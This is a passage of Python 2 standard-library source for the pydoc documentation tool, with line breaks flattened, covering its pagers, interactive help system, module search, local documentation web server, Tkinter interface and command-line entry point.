[] attrs = inherited contents = '\n'.join(contents) if not contents: return title + '\n' return title + '\n' + self.indent(rstrip(contents), ' | ') + '\n' def formatvalue(self, object): """Format an argument default value as text.""" return '=' + self.repr(object) def docroutine(self, object, name=None, mod=None, cl=None): """Produce text documentation for a function or method object.""" realname = object.__name__ name = name or realname note = '' skipdocs = 0 if inspect.ismethod(object): imclass = object.im_class if cl: if imclass is not cl: note = ' from ' + classname(imclass, mod) else: if object.im_self is not None: note = ' method of %s instance' % classname( object.im_self.__class__, mod) else: note = ' unbound %s method' % classname(imclass,mod) object = object.im_func if name == realname: title = self.bold(realname) else: if (cl and realname in cl.__dict__ and cl.__dict__[realname] is object): skipdocs = 1 title = self.bold(name) + ' = ' + realname if inspect.isfunction(object): args, varargs, varkw, defaults = inspect.getargspec(object) argspec = inspect.formatargspec( args, varargs, varkw, defaults, formatvalue=self.formatvalue) if realname == '<lambda>': title = self.bold(name) + ' lambda ' argspec = argspec[1:-1] # remove parentheses else: argspec = '(...)' decl = title + argspec + note if skipdocs: return decl + '\n' else: doc = getdoc(object) or '' return decl + '\n' + (doc and rstrip(self.indent(doc)) + '\n') def _docdescriptor(self, name, value, mod): results = [] push = results.append if name: push(self.bold(name)) push('\n') doc = getdoc(value) or '' if doc: push(self.indent(doc)) push('\n') return ''.join(results) def docproperty(self, object, name=None, mod=None, cl=None): """Produce text documentation for a property.""" return self._docdescriptor(name, object, mod) def docdata(self, object, name=None, mod=None, cl=None): """Produce text documentation for a data descriptor.""" return self._docdescriptor(name, object, mod) def docother(self, object, name=None, mod=None, parent=None, maxlen=None, doc=None): """Produce text documentation for a data object.""" repr = self.repr(object) if maxlen: line = (name and name + ' = ' or '') + repr chop = maxlen - len(line) if chop < 0: repr = repr[:chop] + '...' line = (name and self.bold(name) + ' = ' or '') + repr if doc is not None: line += '\n' + self.indent(str(doc)) return line # --------------------------------------------------------- user interfaces def pager(text): """The first time this is called, determine what kind of pager to use.""" global pager pager = getpager() pager(text) def getpager(): """Decide what method to use for paging through text.""" if type(sys.stdout) is not types.FileType: return plainpager if not hasattr(sys.stdin, "isatty"): return plainpager if not sys.stdin.isatty() or not sys.stdout.isatty(): return plainpager if 'PAGER' in os.environ: if sys.platform == 'win32': # pipes completely broken in Windows return lambda text: tempfilepager(plain(text), os.environ['PAGER']) elif os.environ.get('TERM') in ('dumb', 'emacs'): return lambda text: pipepager(plain(text), os.environ['PAGER']) else: return lambda text: pipepager(text, os.environ['PAGER']) if os.environ.get('TERM') in ('dumb', 'emacs'): return plainpager if sys.platform == 'win32' or sys.platform.startswith('os2'): return lambda text: tempfilepager(plain(text), 'more <') if hasattr(os, 'system') and os.system('(less) 2>/dev/null') == 0: return lambda text: pipepager(text, 'less') import tempfile (fd, filename) = tempfile.mkstemp() os.close(fd) try: if hasattr(os, 'system') and os.system('more "%s"' % filename) == 0: return lambda text: pipepager(text, 'more') else: return ttypager finally: os.unlink(filename) def plain(text): """Remove boldface formatting from text.""" return re.sub('.\b', '', text) def pipepager(text, cmd): """Page through text by feeding it to another program.""" pipe = os.popen(cmd, 'w') try: pipe.write(_encode(text)) pipe.close() except IOError: pass # Ignore broken pipes caused by quitting the pager program. def tempfilepager(text, cmd): """Page through text by invoking a program on a temporary file.""" import tempfile filename = tempfile.mktemp() file = open(filename, 'w') file.write(_encode(text)) file.close() try: os.system(cmd + ' "' + filename + '"') finally: os.unlink(filename) def ttypager(text): """Page through text on a text terminal.""" lines = plain(_encode(plain(text), getattr(sys.stdout, 'encoding', _encoding))).split('\n') try: import tty fd = sys.stdin.fileno() old = tty.tcgetattr(fd) tty.setcbreak(fd) getchar = lambda: sys.stdin.read(1) except (ImportError, AttributeError): tty = None getchar = lambda: sys.stdin.readline()[:-1][:1] try: r = inc = os.environ.get('LINES', 25) - 1 sys.stdout.write(join(lines[:inc], '\n') + '\n') while lines[r:]: sys.stdout.write('-- more --') sys.stdout.flush() c = getchar() if c in ('q', 'Q'): sys.stdout.write('\r \r') break elif c in ('\r', '\n'): sys.stdout.write('\r \r' + lines[r] + '\n') r = r + 1 continue if c in ('b', 'B', '\x1b'): r = r - inc - inc if r < 0: r = 0 sys.stdout.write('\n' + join(lines[r:r+inc], '\n') + '\n') r = r + inc finally: if tty: tty.tcsetattr(fd, tty.TCSAFLUSH, old) def plainpager(text): """Simply print unformatted text. This is the ultimate fallback.""" sys.stdout.write(_encode(plain(text), getattr(sys.stdout, 'encoding', _encoding))) def describe(thing): """Produce a short description of the given thing.""" if inspect.ismodule(thing): if thing.__name__ in sys.builtin_module_names: return 'built-in module ' + thing.__name__ if hasattr(thing, '__path__'): return 'package ' + thing.__name__ else: return 'module ' + thing.__name__ if inspect.isbuiltin(thing): return 'built-in function ' + thing.__name__ if inspect.isgetsetdescriptor(thing): return 'getset descriptor %s.%s.%s' % ( thing.__objclass__.__module__, thing.__objclass__.__name__, thing.__name__) if inspect.ismemberdescriptor(thing): return 'member descriptor %s.%s.%s' % ( thing.__objclass__.__module__, thing.__objclass__.__name__, thing.__name__) if inspect.isclass(thing): return 'class ' + thing.__name__ if inspect.isfunction(thing): return 'function ' + thing.__name__ if inspect.ismethod(thing): return 'method ' + thing.__name__ if type(thing) is types.InstanceType: return 'instance of ' + thing.__class__.__name__ return type(thing).__name__ def locate(path, forceload=0): """Locate an object by name or dotted path, importing as necessary.""" parts = [part for part in split(path, '.') if part] module, n = None, 0 while n < len(parts): nextmodule = safeimport(join(parts[:n+1], '.'), forceload) if nextmodule: module, n = nextmodule, n + 1 else: break if module: object = module else: object = __builtin__ for part in parts[n:]: try: object = getattr(object, part) except AttributeError: return None return object # --------------------------------------- interactive interpreter interface text = TextDoc() html = HTMLDoc() class _OldStyleClass: pass _OLD_INSTANCE_TYPE = type(_OldStyleClass()) def resolve(thing, forceload=0): """Given an object or a path to an object, get the object and its name.""" if isinstance(thing, str): object = locate(thing, forceload) if not object: raise ImportError, 'no Python documentation found for %r' % thing return object, thing else: name = getattr(thing, '__name__', None) return thing, name if isinstance(name, str) else None def render_doc(thing, title='Python Library Documentation: %s', forceload=0): """Render text documentation, given an object or a path to an object.""" object, name = resolve(thing, forceload) desc = describe(object) module = inspect.getmodule(object) if name and '.' in name: desc += ' in ' + name[:name.rfind('.')] elif module and module is not object: desc += ' in module ' + module.__name__ if type(object) is _OLD_INSTANCE_TYPE: # If the passed object is an instance of an old-style class, # document its available methods instead of its value. object = object.__class__ elif not (inspect.ismodule(object) or inspect.isclass(object) or inspect.isroutine(object) or inspect.isgetsetdescriptor(object) or inspect.ismemberdescriptor(object) or isinstance(object, property)): # If the passed object is a piece of data or an instance, # document its available methods instead of its value. object = type(object) desc += ' object' return title % desc + '\n\n' + text.document(object, name) def doc(thing, title='Python Library Documentation: %s', forceload=0): """Display text documentation, given an object or a path to an object.""" try: pager(render_doc(thing, title, forceload)) except (ImportError, ErrorDuringImport), value: print value def writedoc(thing, forceload=0): """Write HTML documentation to a file in the current directory.""" try: object, name = resolve(thing, forceload) page = html.page(describe(object), html.document(object, name)) file = open(name + '.html', 'w') file.write(page) file.close() print 'wrote', name + '.html' except (ImportError, ErrorDuringImport), value: print value def writedocs(dir, pkgpath='', done=None): """Write out HTML documentation for all modules in a directory tree.""" if done is None: done = {} for importer, modname, ispkg in pkgutil.walk_packages([dir], pkgpath): writedoc(modname) return class Helper: # These dictionaries map a topic name to either an alias, or a tuple # (label, seealso-items). The "label" is the label of the corresponding # section in the .rst file under Doc/ and an index into the dictionary # in pydoc_data/topics.py. # # CAUTION: if you change one of these dictionaries, be sure to adapt the # list of needed labels in Doc/tools/pyspecific.py and # regenerate the pydoc_data/topics.py file by running # make pydoc-topics # in Doc/ and copying the output file into the Lib/ directory. keywords = { 'and': 'BOOLEAN', 'as': 'with', 'assert': ('assert', ''), 'break': ('break', 'while for'), 'class': ('class', 'CLASSES SPECIALMETHODS'), 'continue': ('continue', 'while for'), 'def': ('function', ''), 'del': ('del', 'BASICMETHODS'), 'elif': 'if', 'else': ('else', 'while for'), 'except': 'try', 'exec': ('exec', ''), 'finally': 'try', 'for': ('for', 'break continue while'), 'from': 'import', 'global': ('global', 'NAMESPACES'), 'if': ('if', 'TRUTHVALUE'), 'import': ('import', 'MODULES'), 'in': ('in', 'SEQUENCEMETHODS2'), 'is': 'COMPARISON', 'lambda': ('lambda', 'FUNCTIONS'), 'not': 'BOOLEAN', 'or': 'BOOLEAN', 'pass': ('pass', ''), 'print': ('print', ''), 'raise': ('raise', 'EXCEPTIONS'), 'return': ('return', 'FUNCTIONS'), 'try': ('try', 'EXCEPTIONS'), 'while': ('while', 'break continue if TRUTHVALUE'), 'with': ('with', 'CONTEXTMANAGERS EXCEPTIONS yield'), 'yield': ('yield', ''), } # Either add symbols to this dictionary or to the symbols dictionary # directly: Whichever is easier. They are merged later. _symbols_inverse = { 'STRINGS' : ("'", "'''", "r'", "u'", '"""', '"', 'r"', 'u"'), 'OPERATORS' : ('+', '-', '*', '**', '/', '//', '%', '<<', '>>', '&', '|', '^', '~', '<', '>', '<=', '>=', '==', '!=', '<>'), 'COMPARISON' : ('<', '>', '<=', '>=', '==', '!=', '<>'), 'UNARY' : ('-', '~'), 'AUGMENTEDASSIGNMENT' : ('+=', '-=', '*=', '/=', '%=', '&=', '|=', '^=', '<<=', '>>=', '**=', '//='), 'BITWISE' : ('<<', '>>', '&', '|', '^', '~'), 'COMPLEX' : ('j', 'J') } symbols = { '%': 'OPERATORS FORMATTING', '**': 'POWER', ',': 'TUPLES LISTS FUNCTIONS', '.': 'ATTRIBUTES FLOAT MODULES OBJECTS', '...': 'ELLIPSIS', ':': 'SLICINGS DICTIONARYLITERALS', '@': 'def class', '\\': 'STRINGS', '_': 'PRIVATENAMES', '__': 'PRIVATENAMES SPECIALMETHODS', '`': 'BACKQUOTES', '(': 'TUPLES FUNCTIONS CALLS', ')': 'TUPLES FUNCTIONS CALLS', '[': 'LISTS SUBSCRIPTS SLICINGS', ']': 'LISTS SUBSCRIPTS SLICINGS' } for topic, symbols_ in _symbols_inverse.iteritems(): for symbol in symbols_: topics = symbols.get(symbol, topic) if topic not in topics: topics = topics + ' ' + topic symbols[symbol] = topics topics = { 'TYPES': ('types', 'STRINGS UNICODE NUMBERS SEQUENCES MAPPINGS ' 'FUNCTIONS CLASSES MODULES FILES inspect'), 'STRINGS': ('strings', 'str UNICODE SEQUENCES STRINGMETHODS FORMATTING ' 'TYPES'), 'STRINGMETHODS': ('string-methods', 'STRINGS FORMATTING'), 'FORMATTING': ('formatstrings', 'OPERATORS'), 'UNICODE': ('strings', 'encodings unicode SEQUENCES STRINGMETHODS ' 'FORMATTING TYPES'), 'NUMBERS': ('numbers', 'INTEGER FLOAT COMPLEX TYPES'), 'INTEGER': ('integers', 'int range'), 'FLOAT': ('floating', 'float math'), 'COMPLEX': ('imaginary', 'complex cmath'), 'SEQUENCES': ('typesseq', 'STRINGMETHODS FORMATTING xrange LISTS'), 'MAPPINGS': 'DICTIONARIES', 'FUNCTIONS': ('typesfunctions', 'def TYPES'), 'METHODS': ('typesmethods', 'class def CLASSES TYPES'), 'CODEOBJECTS': ('bltin-code-objects', 'compile FUNCTIONS TYPES'), 'TYPEOBJECTS': ('bltin-type-objects', 'types TYPES'), 'FRAMEOBJECTS': 'TYPES', 'TRACEBACKS': 'TYPES', 'NONE': ('bltin-null-object', ''), 'ELLIPSIS': ('bltin-ellipsis-object', 'SLICINGS'), 'FILES': ('bltin-file-objects', ''), 'SPECIALATTRIBUTES': ('specialattrs', ''), 'CLASSES': ('types', 'class SPECIALMETHODS PRIVATENAMES'), 'MODULES': ('typesmodules', 'import'), 'PACKAGES': 'import', 'EXPRESSIONS': ('operator-summary', 'lambda or and not in is BOOLEAN ' 'COMPARISON BITWISE SHIFTING BINARY FORMATTING POWER ' 'UNARY ATTRIBUTES SUBSCRIPTS SLICINGS CALLS TUPLES ' 'LISTS DICTIONARIES BACKQUOTES'), 'OPERATORS': 'EXPRESSIONS', 'PRECEDENCE': 'EXPRESSIONS', 'OBJECTS': ('objects', 'TYPES'), 'SPECIALMETHODS': ('specialnames', 'BASICMETHODS ATTRIBUTEMETHODS ' 'CALLABLEMETHODS SEQUENCEMETHODS1 MAPPINGMETHODS ' 'SEQUENCEMETHODS2 NUMBERMETHODS CLASSES'), 'BASICMETHODS': ('customization', 'cmp hash repr str SPECIALMETHODS'), 'ATTRIBUTEMETHODS': ('attribute-access', 'ATTRIBUTES SPECIALMETHODS'), 'CALLABLEMETHODS': ('callable-types', 'CALLS SPECIALMETHODS'), 'SEQUENCEMETHODS1': ('sequence-types', 'SEQUENCES SEQUENCEMETHODS2 ' 'SPECIALMETHODS'), 'SEQUENCEMETHODS2': ('sequence-methods', 'SEQUENCES SEQUENCEMETHODS1 ' 'SPECIALMETHODS'), 'MAPPINGMETHODS': ('sequence-types', 'MAPPINGS SPECIALMETHODS'), 'NUMBERMETHODS': ('numeric-types', 'NUMBERS AUGMENTEDASSIGNMENT ' 'SPECIALMETHODS'), 'EXECUTION': ('execmodel', 'NAMESPACES DYNAMICFEATURES EXCEPTIONS'), 'NAMESPACES': ('naming', 'global ASSIGNMENT DELETION DYNAMICFEATURES'), 'DYNAMICFEATURES': ('dynamic-features', ''), 'SCOPING': 'NAMESPACES', 'FRAMES': 'NAMESPACES', 'EXCEPTIONS': ('exceptions', 'try except finally raise'), 'COERCIONS': ('coercion-rules','CONVERSIONS'), 'CONVERSIONS': ('conversions', 'COERCIONS'), 'IDENTIFIERS': ('identifiers', 'keywords SPECIALIDENTIFIERS'), 'SPECIALIDENTIFIERS': ('id-classes', ''), 'PRIVATENAMES': ('atom-identifiers', ''), 'LITERALS': ('atom-literals', 'STRINGS BACKQUOTES NUMBERS ' 'TUPLELITERALS LISTLITERALS DICTIONARYLITERALS'), 'TUPLES': 'SEQUENCES', 'TUPLELITERALS': ('exprlists', 'TUPLES LITERALS'), 'LISTS': ('typesseq-mutable', 'LISTLITERALS'), 'LISTLITERALS': ('lists', 'LISTS LITERALS'), 'DICTIONARIES': ('typesmapping', 'DICTIONARYLITERALS'), 'DICTIONARYLITERALS': ('dict', 'DICTIONARIES LITERALS'), 'BACKQUOTES': ('string-conversions', 'repr str STRINGS LITERALS'), 'ATTRIBUTES': ('attribute-references', 'getattr hasattr setattr ' 'ATTRIBUTEMETHODS'), 'SUBSCRIPTS': ('subscriptions', 'SEQUENCEMETHODS1'), 'SLICINGS': ('slicings', 'SEQUENCEMETHODS2'), 'CALLS': ('calls', 'EXPRESSIONS'), 'POWER': ('power', 'EXPRESSIONS'), 'UNARY': ('unary', 'EXPRESSIONS'), 'BINARY': ('binary', 'EXPRESSIONS'), 'SHIFTING': ('shifting', 'EXPRESSIONS'), 'BITWISE': ('bitwise', 'EXPRESSIONS'), 'COMPARISON': ('comparisons', 'EXPRESSIONS BASICMETHODS'), 'BOOLEAN': ('booleans', 'EXPRESSIONS TRUTHVALUE'), 'ASSERTION': 'assert', 'ASSIGNMENT': ('assignment', 'AUGMENTEDASSIGNMENT'), 'AUGMENTEDASSIGNMENT': ('augassign', 'NUMBERMETHODS'), 'DELETION': 'del', 'PRINTING': 'print', 'RETURNING': 'return', 'IMPORTING': 'import', 'CONDITIONAL': 'if', 'LOOPING': ('compound', 'for while break continue'), 'TRUTHVALUE': ('truth', 'if while and or not BASICMETHODS'), 'DEBUGGING': ('debugger', 'pdb'), 'CONTEXTMANAGERS': ('context-managers', 'with'), } def __init__(self, input=None, output=None): self._input = input self._output = output input = property(lambda self: self._input or sys.stdin) output = property(lambda self: self._output or sys.stdout) def __repr__(self): if inspect.stack()[1][3] == '?': self() return '' return '<pydoc.Helper instance>' _GoInteractive = object() def __call__(self, request=_GoInteractive): if request is not self._GoInteractive: self.help(request) else: self.intro() self.interact() self.output.write(''' You are now leaving help and returning to the Python interpreter. If you want to ask for help on a particular object directly from the interpreter, you can type "help(object)". Executing "help('string')" has the same effect as typing a particular string at the help> prompt. ''') def interact(self): self.output.write('\n') while True: try: request = self.getline('help> ') if not request: break except (KeyboardInterrupt, EOFError): break request = strip(replace(request, '"', '', "'", '')) if lower(request) in ('q', 'quit'): break self.help(request) def getline(self, prompt): """Read one line, using raw_input when available.""" if self.input is sys.stdin: return raw_input(prompt) else: self.output.write(prompt) self.output.flush() return self.input.readline() def help(self, request): if type(request) is type(''): request = request.strip() if request == 'help': self.intro() elif request == 'keywords': self.listkeywords() elif request == 'symbols': self.listsymbols() elif request == 'topics': self.listtopics() elif request == 'modules': self.listmodules() elif request[:8] == 'modules ': self.listmodules(split(request)[1]) elif request in self.symbols: self.showsymbol(request) elif request in self.keywords: self.showtopic(request) elif request in self.topics: self.showtopic(request) elif request: doc(request, 'Help on %s:') elif isinstance(request, Helper): self() else: doc(request, 'Help on %s:') self.output.write('\n') def intro(self): self.output.write(''' Welcome to Python %s! This is the online help utility. If this is your first time using Python, you should definitely check out the tutorial on the Internet at http://docs.python.org/%s/tutorial/. Enter the name of any module, keyword, or topic to get help on writing Python programs and using Python modules. To quit this help utility and return to the interpreter, just type "quit". To get a list of available modules, keywords, or topics, type "modules", "keywords", or "topics". Each module also comes with a one-line summary of what it does; to list the modules whose summaries contain a given word such as "spam", type "modules spam". ''' % tuple([sys.version[:3]]*2)) def list(self, items, columns=4, width=80): items = items[:] items.sort() colw = width / columns rows = (len(items) + columns - 1) / columns for row in range(rows): for col in range(columns): i = col * rows + row if i < len(items): self.output.write(items[i]) if col < columns - 1: self.output.write(' ' + ' ' * (colw-1 - len(items[i]))) self.output.write('\n') def listkeywords(self): self.output.write(''' Here is a list of the Python keywords. Enter any keyword to get more help. ''') self.list(self.keywords.keys()) def listsymbols(self): self.output.write(''' Here is a list of the punctuation symbols which Python assigns special meaning to. Enter any symbol to get more help. ''') self.list(self.symbols.keys()) def listtopics(self): self.output.write(''' Here is a list of available topics. Enter any topic name to get more help. ''') self.list(self.topics.keys()) def showtopic(self, topic, more_xrefs=''): try: import pydoc_data.topics except ImportError: self.output.write(''' Sorry, topic and keyword documentation is not available because the module "pydoc_data.topics" could not be found. ''') return target = self.topics.get(topic, self.keywords.get(topic)) if not target: self.output.write('no documentation found for %s\n' % repr(topic)) return if type(target) is type(''): return self.showtopic(target, more_xrefs) label, xrefs = target try: doc = pydoc_data.topics.topics[label] except KeyError: self.output.write('no documentation found for %s\n' % repr(topic)) return pager(strip(doc) + '\n') if more_xrefs: xrefs = (xrefs or '') + ' ' + more_xrefs if xrefs: import StringIO, formatter buffer = StringIO.StringIO() formatter.DumbWriter(buffer).send_flowing_data( 'Related help topics: ' + join(split(xrefs), ', ') + '\n') self.output.write('\n%s\n' % buffer.getvalue()) def showsymbol(self, symbol): target = self.symbols[symbol] topic, _, xrefs = target.partition(' ') self.showtopic(topic, xrefs) def listmodules(self, key=''): if key: self.output.write(''' Here is a list of matching modules. Enter any module name to get more help. ''') apropos(key) else: self.output.write(''' Please wait a moment while I gather a list of all available modules... ''') modules = {} def callback(path, modname, desc, modules=modules): if modname and modname[-9:] == '.__init__': modname = modname[:-9] + ' (package)' if find(modname, '.') < 0: modules[modname] = 1 def onerror(modname): callback(None, modname, None) ModuleScanner().run(callback, onerror=onerror) self.list(modules.keys()) self.output.write(''' Enter any module name to get more help. Or, type "modules spam" to search for modules whose descriptions contain the word "spam". ''') help = Helper() class Scanner: """A generic tree iterator.""" def __init__(self, roots, children, descendp): self.roots = roots[:] self.state = [] self.children = children self.descendp = descendp def next(self): if not self.state: if not self.roots: return None root = self.roots.pop(0) self.state = [(root, self.children(root))] node, children = self.state[-1] if not children: self.state.pop() return self.next() child = children.pop(0) if self.descendp(child): self.state.append((child, self.children(child))) return child class ModuleScanner: """An interruptible scanner that searches module synopses.""" def run(self, callback, key=None, completer=None, onerror=None): if key: key = lower(key) self.quit = False seen = {} for modname in sys.builtin_module_names: if modname != '__main__': seen[modname] = 1 if key is None: callback(None, modname, '') else: desc = split(__import__(modname).__doc__ or '', '\n')[0] if find(lower(modname + ' - ' + desc), key) >= 0: callback(None, modname, desc) for importer, modname, ispkg in pkgutil.walk_packages(onerror=onerror): if self.quit: break if key is None: callback(None, modname, '') else: loader = importer.find_module(modname) if hasattr(loader,'get_source'): import StringIO desc = source_synopsis( StringIO.StringIO(loader.get_source(modname)) ) or '' if hasattr(loader,'get_filename'): path = loader.get_filename(modname) else: path = None else: module = loader.load_module(modname) desc = (module.__doc__ or '').splitlines()[0] path = getattr(module,'__file__',None) if find(lower(modname + ' - ' + desc), key) >= 0: callback(path, modname, desc) if completer: completer() def apropos(key): """Print all the one-line module summaries that contain a substring.""" def callback(path, modname, desc): if modname[-9:] == '.__init__': modname = modname[:-9] + ' (package)' print modname, desc and '- ' + desc def onerror(modname): pass with warnings.catch_warnings(): warnings.filterwarnings('ignore') # ignore problems during import ModuleScanner().run(callback, key, onerror=onerror) # --------------------------------------------------- web browser interface def serve(port, callback=None, completer=None): import BaseHTTPServer, mimetools, select # Patch up mimetools.Message so it doesn't break if rfc822 is reloaded. class Message(mimetools.Message): def __init__(self, fp, seekable=1): Message = self.__class__ Message.__bases__[0].__bases__[0].__init__(self, fp, seekable) self.encodingheader = self.getheader('content-transfer-encoding') self.typeheader = self.getheader('content-type') self.parsetype() self.parseplist() class DocHandler(BaseHTTPServer.BaseHTTPRequestHandler): def send_document(self, title, contents): try: self.send_response(200) self.send_header('Content-Type', 'text/html') self.end_headers() self.wfile.write(html.page(title, contents)) except IOError: pass def do_GET(self): path = self.path if path[-5:] == '.html': path = path[:-5] if path[:1] == '/': path = path[1:] if path and path != '.': try: obj = locate(path, forceload=1) except ErrorDuringImport, value: self.send_document(path, html.escape(str(value))) return if obj: self.send_document(describe(obj), html.document(obj, path)) else: self.send_document(path, 'no Python documentation found for %s' % repr(path)) else: heading = html.heading( '<big><big><strong>Python: Index of Modules</strong></big></big>', '#ffffff', '#7799ee') def bltinlink(name): return '<a href="%s.html">%s</a>' % (name, name) names = filter(lambda x: x != '__main__', sys.builtin_module_names) contents = html.multicolumn(names, bltinlink) indices = ['<p>' + html.bigsection( 'Built-in Modules', '#ffffff', '#ee77aa', contents)] seen = {} for dir in sys.path: indices.append(html.index(dir, seen)) contents = heading + join(indices) + '''<p align=right> <font color="#909090" face="helvetica, arial"><strong> pydoc</strong> by Ka-Ping Yee &lt;ping@lfw.org&gt;</font>''' self.send_document('Index of Modules', contents) def log_message(self, *args): pass class DocServer(BaseHTTPServer.HTTPServer): def __init__(self, port, callback): host = 'localhost' self.address = (host, port) self.url = 'http://%s:%d/' % (host, port) self.callback = callback self.base.__init__(self, self.address, self.handler) def serve_until_quit(self): import select self.quit = False while not self.quit: rd, wr, ex = select.select([self.socket.fileno()], [], [], 1) if rd: self.handle_request() def server_activate(self): self.base.server_activate(self) if self.callback: self.callback(self) DocServer.base = BaseHTTPServer.HTTPServer DocServer.handler = DocHandler DocHandler.MessageClass = Message try: try: DocServer(port, callback).serve_until_quit() except (KeyboardInterrupt, select.error): pass finally: if completer: completer() # ----------------------------------------------------- graphical interface def gui(): """Graphical interface (starts web server and pops up a control window).""" class GUI: def __init__(self, window, port=7464): self.window = window self.server = None self.scanner = None import Tkinter self.server_frm = Tkinter.Frame(window) self.title_lbl = Tkinter.Label(self.server_frm, text='Starting server...\n ') self.open_btn = Tkinter.Button(self.server_frm, text='open browser', command=self.open, state='disabled') self.quit_btn = Tkinter.Button(self.server_frm, text='quit serving', command=self.quit, state='disabled') self.search_frm = Tkinter.Frame(window) self.search_lbl = Tkinter.Label(self.search_frm, text='Search for') self.search_ent = Tkinter.Entry(self.search_frm) self.search_ent.bind('<Return>', self.search) self.stop_btn = Tkinter.Button(self.search_frm, text='stop', pady=0, command=self.stop, state='disabled') if sys.platform == 'win32': # Trying to hide and show this button crashes under Windows. self.stop_btn.pack(side='right') self.window.title('pydoc') self.window.protocol('WM_DELETE_WINDOW', self.quit) self.title_lbl.pack(side='top', fill='x') self.open_btn.pack(side='left', fill='x', expand=1) self.quit_btn.pack(side='right', fill='x', expand=1) self.server_frm.pack(side='top', fill='x') self.search_lbl.pack(side='left') self.search_ent.pack(side='right', fill='x', expand=1) self.search_frm.pack(side='top', fill='x') self.search_ent.focus_set() font = ('helvetica', sys.platform == 'win32' and 8 or 10) self.result_lst = Tkinter.Listbox(window, font=font, height=6) self.result_lst.bind('<Button-1>', self.select) self.result_lst.bind('<Double-Button-1>', self.goto) self.result_scr = Tkinter.Scrollbar(window, orient='vertical', command=self.result_lst.yview) self.result_lst.config(yscrollcommand=self.result_scr.set) self.result_frm = Tkinter.Frame(window) self.goto_btn = Tkinter.Button(self.result_frm, text='go to selected', command=self.goto) self.hide_btn = Tkinter.Button(self.result_frm, text='hide results', command=self.hide) self.goto_btn.pack(side='left', fill='x', expand=1) self.hide_btn.pack(side='right', fill='x', expand=1) self.window.update() self.minwidth = self.window.winfo_width() self.minheight = self.window.winfo_height() self.bigminheight = (self.server_frm.winfo_reqheight() + self.search_frm.winfo_reqheight() + self.result_lst.winfo_reqheight() + self.result_frm.winfo_reqheight()) self.bigwidth, self.bigheight = self.minwidth, self.bigminheight self.expanded = 0 self.window.wm_geometry('%dx%d' % (self.minwidth, self.minheight)) self.window.wm_minsize(self.minwidth, self.minheight) self.window.tk.willdispatch() import threading threading.Thread( target=serve, args=(port, self.ready, self.quit)).start() def ready(self, server): self.server = server self.title_lbl.config( text='Python documentation server at\n' + server.url) self.open_btn.config(state='normal') self.quit_btn.config(state='normal') def open(self, event=None, url=None): url = url or self.server.url try: import webbrowser webbrowser.open(url) except ImportError: # pre-webbrowser.py compatibility if sys.platform == 'win32': os.system('start "%s"' % url) else: rc = os.system('netscape -remote "openURL(%s)" &' % url) if rc: os.system('netscape "%s" &' % url) def quit(self, event=None): if self.server: self.server.quit = 1 self.window.quit() def search(self, event=None): key = self.search_ent.get() self.stop_btn.pack(side='right') self.stop_btn.config(state='normal') self.search_lbl.config(text='Searching for "%s"...' % key) self.search_ent.forget() self.search_lbl.pack(side='left') self.result_lst.delete(0, 'end') self.goto_btn.config(state='disabled') self.expand() import threading if self.scanner: self.scanner.quit = 1 self.scanner = ModuleScanner() threading.Thread(target=self.scanner.run, args=(self.update, key, self.done)).start() def update(self, path, modname, desc): if modname[-9:] == '.__init__': modname = modname[:-9] + ' (package)' self.result_lst.insert('end', modname + ' - ' + (desc or '(no description)')) def stop(self, event=None): if self.scanner: self.scanner.quit = 1 self.scanner = None def done(self): self.scanner = None self.search_lbl.config(text='Search for') self.search_lbl.pack(side='left') self.search_ent.pack(side='right', fill='x', expand=1) if sys.platform != 'win32': self.stop_btn.forget() self.stop_btn.config(state='disabled') def select(self, event=None): self.goto_btn.config(state='normal') def goto(self, event=None): selection = self.result_lst.curselection() if selection: modname = split(self.result_lst.get(selection[0]))[0] self.open(url=self.server.url + modname + '.html') def collapse(self): if not self.expanded: return self.result_frm.forget() self.result_scr.forget() self.result_lst.forget() self.bigwidth = self.window.winfo_width() self.bigheight = self.window.winfo_height() self.window.wm_geometry('%dx%d' % (self.minwidth, self.minheight)) self.window.wm_minsize(self.minwidth, self.minheight) self.expanded = 0 def expand(self): if self.expanded: return self.result_frm.pack(side='bottom', fill='x') self.result_scr.pack(side='right', fill='y') self.result_lst.pack(side='top', fill='both', expand=1) self.window.wm_geometry('%dx%d' % (self.bigwidth, self.bigheight)) self.window.wm_minsize(self.minwidth, self.bigminheight) self.expanded = 1 def hide(self, event=None): self.stop() self.collapse() import Tkinter try: root = Tkinter.Tk() # Tk will crash if pythonw.exe has an XP .manifest # file and the root has is not destroyed explicitly. # If the problem is ever fixed in Tk, the explicit # destroy can go. try: gui = GUI(root) root.mainloop() finally: root.destroy() except KeyboardInterrupt: pass # -------------------------------------------------- command-line interface def ispath(x): return isinstance(x, str) and find(x, os.sep) >= 0 def cli(): """Command-line interface (looks at sys.argv to decide what to do).""" import getopt class BadUsage: pass # Scripts don't get the current directory in their path by default # unless they are run with the '-m' switch if '' not in sys.path: scriptdir = os.path.dirname(sys.argv[0]) if scriptdir in sys.path: sys.path.remove(scriptdir) sys.path.insert(0, '.') try: opts, args = getopt.getopt(sys.argv[1:], 'gk:p:w') writing = 0 for opt, val in opts: if opt == '-g': gui() return if opt == '-k': apropos(val) return if opt == '-p': try: port = int(val) except ValueError: raise BadUsage def ready(server): print 'pydoc server ready at %s' % server.url def stopped(): print 'pydoc server stopped' serve(port, ready, stopped) return if opt == '-w': writing = 1 if not args: raise BadUsage for arg in args: if ispath(arg) and not os.path.exists(arg): print 'file %r does not exist' % arg break try: if ispath(arg) and os.path.isfile(arg): arg = importfile(arg) if writing: if ispath(arg) and os.path.isdir(arg): writedocs(arg) else: writedoc(arg) else: help.help(arg) except ErrorDuringImport, value: print value except (getopt.error, BadUsage): cmd = os.path.basename(sys.argv[0]) print """pydoc - the Python documentation tool %s <name> ... Show text documentation on something. <name> may be the name of a Python keyword, topic, function, module, or package, or a dotted reference to a class or function within a module or module in a package. If <name> contains a '%s', it is used as the path to a Python source file to document. If name is 'keywords', 'topics', or 'modules', a listing of these things is displayed. %s -k <keyword> Search for a keyword in the synopsis lines of all available modules. %s -p <port> Start an HTTP server on the given port on the local machine. %s -g Pop up a graphical interface for finding and serving documentation. %s -w <name> ... Write out the HTML documentation for a module to a file in the current directory. If <name> contains a '%s', it is treated as a filename; if it names a directory, documentation is written for all the contents. """ % (cmd, os.sep, cmd, cmd, cmd, cmd, os.sep) if __name__ == '__main__': cli()
bootstrap_test.py
